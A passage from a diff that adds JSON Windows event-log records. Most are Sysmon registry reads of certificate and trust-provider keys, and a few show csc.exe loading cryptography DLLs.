Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570860430000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 